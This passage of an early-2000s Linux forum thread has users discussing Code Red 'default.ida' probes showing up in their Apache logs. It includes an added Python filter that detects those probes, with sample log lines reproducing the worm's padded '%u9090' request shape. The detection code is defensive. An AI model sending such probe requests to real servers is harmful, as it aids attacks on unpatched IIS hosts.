    Funnily enough, such services usually aren't even running on most Windows boxes ;o) -- so for comparison you should also show only http, https and http-proxy...

    Tosk

  9. #9
    404 - Title not found Avatar of LKH
    Registered since
    Jun 1999
    Location
    Jena
    Posts
    3,709

    Hello,

    Linux servers get scanned too (the requests just now came from Italy and Spain). All IPs begin with 213.

    Apache just dutifully reports that the file default.ida does not exist. So no reason to panic. By the way, my default isn't called Ida but Angie
    freedom is just another word for nothing left to lose ...
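
Added example, not part of the original thread: a small Python filter that picks the `/default.ida?` probes out of an access log like the one in post #1 and groups them by source host. The sample lines, host names and the `MIN_PAD` threshold are constructed, and treating any non-4xx status as worth a closer look is an assumption of this example.

```python
import re
from collections import defaultdict

# Combined Log Format prefix: host ident user [time] "request" status size
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)
# Shape of the probes in the posted log: /default.ida? followed by a long run
# of one padding letter (X or N). MIN_PAD is an assumed threshold.
MIN_PAD = 100
PROBE_RE = re.compile(
    r'^(?i:/default\.ida)\?(?P<ch>[A-Za-z])(?P=ch){%d,}' % (MIN_PAD - 1)
)


def classify(line):
    """Return details of a default.ida probe, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    _method, _, target = m.group("request").partition(" ")
    # Mail and forum software wrap the long query string with spaces, so
    # whitespace inside the request target is removed before matching.
    target = re.sub(r"\s+", "", target)
    probe = PROBE_RE.match(target)
    if not probe:
        return None
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "pad_char": probe.group("ch"),
        "pad_len": len(probe.group(0)) - len("/default.ida?"),
    }


def summarize(lines):
    """Group probes by source host; flag hosts that got a non-4xx answer."""
    hosts = defaultdict(lambda: {"hits": 0, "statuses": set(), "review": False})
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        entry = hosts[hit["host"]]
        entry["hits"] += 1
        entry["statuses"].add(hit["status"])
        # Assumption: a 4xx means nothing on this server handled the request.
        if not 400 <= hit["status"] < 500:
            entry["review"] = True
    return dict(hosts)


# Constructed sample lines (padding generated here, payload tail shortened).
PAD_X, PAD_N = "X" * 224, "N" * 224
SAMPLE_LOG = [
    f'host-a.example - - [05/Aug/2001:15:00:14 +0200] "GET /default.ida?{PAD_X}%u9090=a HTTP/1.0" 404 205 "-" "-"',
    f'192.0.2.8 - - [05/Aug/2001:15:28:11 +0200] "GET /default.ida?{PAD_N}%u9090=a HTTP/1.0" 400 252 "-" "-"',
    'dialin.example - - [05/Aug/2001:15:16:59 +0200] "-" 408 - "-" "-"',
    'crawler.example - - [05/Aug/2001:15:58:00 +0200] "GET /robots.txt HTTP/1.0" 404 204 "-" "AbachoBOT"',
    f'host-a.example - - [05/Aug/2001:15:15:39 +0200] "GET /default.ida?{PAD_X[:38]} {PAD_X[38:]}%u9090=a HTTP/1.0" 404 205 "-" "-"',
    f'192.0.2.9 - - [05/Aug/2001:16:09:13 +0200] "GET /default.ida?{PAD_X}=a HTTP/1.0" 200 1 "-" "-"',
]

if __name__ == "__main__":
    for host, info in sorted(summarize(SAMPLE_LOG).items()):
        flag = "REVIEW" if info["review"] else "rejected"
        print(f'{host:18} hits={info["hits"]} status={sorted(info["statuses"])} {flag}')
```
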

  10. #10
    Communicator
    Registered since
    Apr 1999
    Location
    Reutlingen
    Posts
    3,673

    Hello,

    here is a tip:
    http://hogwash.sourceforge.net/

    It can be used to drop or modify packets.

    Regards

    Eicke

  11. #11
    Registered user
    Registered since
    May 1999
    Location
    Vettelschoß, RP, Germany
    Posts
    366

    Yep, my freshly set up iptables also reported lots of break-in attempts to me last night - especially on port 25 (smtp). It was a real bombardment. The IP addresses, however, came from all sorts of places. I assume they are forged anyway.

    Hein
    AMD K6/2-500
    256 MB RAM
    Mandrake 8.1

  12. #12
    berell
    Guest

    I've got a question about logging such attacks:
    how do I get them logged with iptables into a file, e.g. /var/log/firewall-log?
    -bernd

  13. #13
    Registered user Avatar of Sven_R
    Registered since
    Dec 2000
    Location
    12049 Berlin
    Posts
    476

    hi
    Well, lately I too have been wondering who is doing what there.
    Unfortunately I found nothing.

    I have now noticed that this jumble of characters is an ISS virus.

    Thank GOD I have a LINUX SERVER and not such an ISS slinger.

    I have to say that I find such viruses sh..ty, okay, all viruses are.
    But most of them only disturb the system and not the network.
    The internet has been slow enough lately, so one shouldn't also create viruses that randomly search for all ISS servers.
    cu
